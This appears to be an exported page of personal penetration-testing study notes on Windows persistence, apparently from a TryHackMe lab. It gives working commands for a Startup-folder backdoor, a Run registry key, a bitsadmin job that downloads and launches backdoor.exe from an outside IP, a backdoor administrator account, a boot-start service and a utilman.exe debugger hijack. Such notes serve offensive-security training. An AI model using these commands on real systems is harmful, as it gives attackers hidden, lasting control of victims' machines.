<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>Persistence</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Persistence</h1>

      <div class="ck-content">
        <h2>Startup</h2>

        <p><code>The path of the startup folder is: C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>

        </p>
        <p>Browse to that path and upload the binary you generated with msfvenom..
          Since the binary is in the startup folder every time a user restarts its
          computer and logs in the backdoor will be executed and Metasploit will
          receive the connection.</p>
         <h2><span style="color:rgb(99,0,0)"><strong>Editing registries</strong></span></h2>

        <p><span style="color:rgb(0,0,0)">Depending on the registries a low privileged user might be able to edit them. With this in mind, an attacker could edit the registries to achieve persistence.</span>

        </p>
        <p><span style="color:rgb(0,0,0)">An example of an editable registry is: </span><code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>

        </p>
        <p>First, let's move the backdoor to the AppData folder. You can either move
          it from the Startup folder or upload it again to the AppData folder.</p>
        <p><code>reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” /v Backdoor /t REG_SZ /d “C:\Users\tryhackme\AppData\Roaming\backdoor.exe”</code>

        </p>
         <h2><span style="color:rgb(99,0,0)"><strong>BITS Jobs</strong></span></h2>

        <p>﻿BITS (Background Intelligent Transfer Service)﻿ is used for file transfer
          between machines (downloading or uploading) using idle network bandwidth.</p>
        <p>BITS Jobs are containers that contain files that need to be transferred.
          However, when creating the job the container is empty and it needs to be
          populated (specify one or more files to be transferred). It's also needed
          to add the source and the destination.</p>
        <p><code>bitsadmin /create backdoor</code>

        </p>
        <p><code>bitsadmin /addfile backdoor “http://10.17.17.11/backdoor.exe”  “C:\Users\tryhackme\Documents\backdoor.exe”</code>

        </p>
        <p><code>bitsadmin /SetNotifyCmdLine 1 cmd.exe “/c bitsadmin.exe /complete backdoor | start /B C:\Users\tryhackme\Documents\backdoor.exe”</code>

        </p>
        <p><code>bitsadmin /SetMinRetryDelay backdoor 30</code>

        </p>
         <h2>Backdoor user</h2>

         <h2><span class="text-tiny"><code>net user /add &lt;USER&gt; &lt;PASSWORD&gt;</code></span></h2>

        <p><code>net localgroup Administrators Backdoor /add</code>

        </p>
         <h2>New service</h2>

        <p>Create the service using the New-Service cmdlet: </p>
        <p><code>New-Service -Name "&lt;SERVICE_NAME&gt;" -BinaryPathName "&lt;PATH_TO_BINARY&gt;" -Description "&lt;SERVICE_DESCRIPTION&gt;" -StartupType "Boot"</code>

        </p>
         <h2>Powershell Scheduled Tasks</h2>

        <p>Powershell can be used to create a scheduled task and assure persistence
          but for that, we'll have to define multiple cmdlets. These are:</p>
        <ol>
          <li>New-ScheduledTaskAction</li>
          <li>New-ScheduledTaskTrigger</li>
          <li>New-ScheduledTaskPrincipal</li>
          <li>New-ScheduledTaskSettingsSet</li>
          <li>Register-ScheduledTask</li>
        </ol>
        <p>
          <br />New-ScheduledTaskAction - Is used to define the action that is going to
          be made.</p>
        <p>New-ScheduledTaskTrigger - Defining the trigger (daily/weekly/monthly,
          etc). The trigger can be considered a condition that when met the scheduled
          task will launch the action.</p>
        <p>New-ScheduledTaskPrincipal - Is the user that the task will be run as.</p>
        <p>New-ScheduledTaskSettingsSet - This will set our above-mentioned settings.</p>
        <p>Register-ScheduledTask - Will create the task.</p>
        <figure class="image image_resized"
        style="width:894px">
          <img src="Persistence/TNJVyjL.png" />
        </figure><pre><code class="language-text-plain">REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f</code></pre>

        <p> </p>
        <p> </p>
      </div>
    </div>
  </body>

</html>